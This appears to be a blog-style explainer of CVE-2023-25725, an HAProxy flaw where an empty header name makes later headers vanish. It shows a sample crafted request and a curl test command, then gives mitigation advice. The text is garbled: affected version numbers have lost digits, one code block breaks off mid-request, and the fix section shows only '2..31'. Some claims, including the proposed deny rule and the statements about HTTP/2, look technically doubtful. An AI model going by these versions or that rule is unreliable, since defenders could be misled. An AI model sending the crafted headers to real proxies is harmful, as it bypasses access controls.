CVE-2023-25725 - How HAProxy Lost HTTP Headers and Let Attackers Slip Through Access Controls

HAProxy is one of the world’s most popular load balancers and reverse proxies. However, even rock-solid software like HAProxy can have its flaws. This post digs deep into CVE-2023-25725 – a sneaky bug that lets crafty attackers bypass access controls by making some headers vanish, thanks to HAProxy’s trouble handling empty HTTP header field names. We'll explain the bug in plain language, show code snippets, walk through exploitation, and give advice for defense.

What Is CVE-2023-25725?

In short: HAProxy versions before 2.7.3 (and several earlier branches) could allow attackers to bypass access control by sending HTTP requests with specially crafted empty headers. This issue is also called “request smuggling” because it lets attackers sneak bad requests past security checks.

When HAProxy receives HTTP/1 requests with empty header names (for example, ": value\r\n"), it gets confused and drops some headers. This means security-sensitive headers like Authorization, Cookie, or X-Forwarded-For could be silently lost during processing. If your access control depends on these headers, users can easily sneak past.

Also: 2.6.x < 2.6.9, 2.5.x < 2.5.12, 2.4.x < 2.4.22, 2.2.x < 2.2.29, 2..x < 2..31

- Only HTTP/1. and HTTP/1.1 traffic for this bug. HTTP/2 and HTTP/3 are not at major risk, though they do drop headers too (with less impact).

HAProxy processes HTTP headers in a parser. Normally, a request header looks like this

Header-Name: value\r\n

But someone can send a header like

: value\r\n

There’s nothing before the colon! HAProxy is supposed to reject empty header names. Due to this bug, it sometimes accepts them, then gets out of sync with how it counts or stores headers.

When this happens, HAProxy may truncate the rest of the header list. It acts like the empty header is the last header, so anything after it is ignored – as if it was never sent.

If your firewall or access control checks are looking for headers that can disappear, an attacker can send a request like this to bypass your controls.

Sample Exploit Request

GET /protected HTTP/1.1
Host: example.com
Authorization: Bearer SECRET-TOKEN
: this header has no name!
Cookie: sessionid=abc123
X-Forwarded-For: 1.2.3.4

When HAProxy gets this, it may only see up to the first empty header, so Cookie and X-Forwarded-For won’t reach the backend server, and access logic relying on them fails.

Exploit Details

Let’s see how an attacker could use this bug to bypass controls.

Find a control mechanism that uses headers

Many sites restrict access based on headers (e.g., a Cookie, Authorization, or X-Forwarded-For).

`http

GET /private HTTP/1.1

Authorization: Bearer secret

:

At the Code Level

The vulnerable code didn’t correctly reject headers like ": ...", so the htx_add_header() function (in HAProxy’s code) would get stuck, drop a header, or process wrong boundaries.

For automated testing, you could use curl with a crafted header

curl -v -H 'Authorization: Bearer secret' -H ': malicious' -H 'Cookie: attacker=yes' http://target

Inspect your backend logs: did the Cookie reach your application? If not, you’re affected!

Real-World Risks

* Bypassing authentication (if Authorization or Cookie headers are dropped)
* Evading WAF and rate limiting (if dropped headers hide true IPs or tokens)
* Session hijacking and other “confused deputy” situations

Note: HTTP/2 and HTTP/3 drop these headers before parsing, so the attacker can't get the same result.

References and More Reading

- NVD Advisory for CVE-2023-25725
- HAProxy GitHub - Fixed commit
- HAProxy Release Notes (2.7.3)
- WAF Blind Spot: HTTP Request Smuggling

How Do I Fix or Defend Against This?

Upgrade!

2..31

If you run any earlier version, you’re vulnerable.

Bonus defense:  
Write an HAProxy http-request deny if { hdr_reg("^") -m found } rule to block empty headers if you can’t upgrade right away.

The Bottom Line

CVE-2023-25725 is a good reminder that subtle protocol parsing bugs can cause serious security risks. Attackers love when software “loses” security headers — keep your proxies up to date, and be careful about trusting HTTP input!

If you use HAProxy for access control or traffic filtering, patch now. Test with intentionally bad headers – don’t assume your proxy is always behaving!


Stay safe, upgrade your stack, and follow official HAProxy security announcements for the latest news.

Timeline

Published on: 02/14/2023 19:15:00 UTC
Last modified on: 02/25/2023 06:15:00 UTC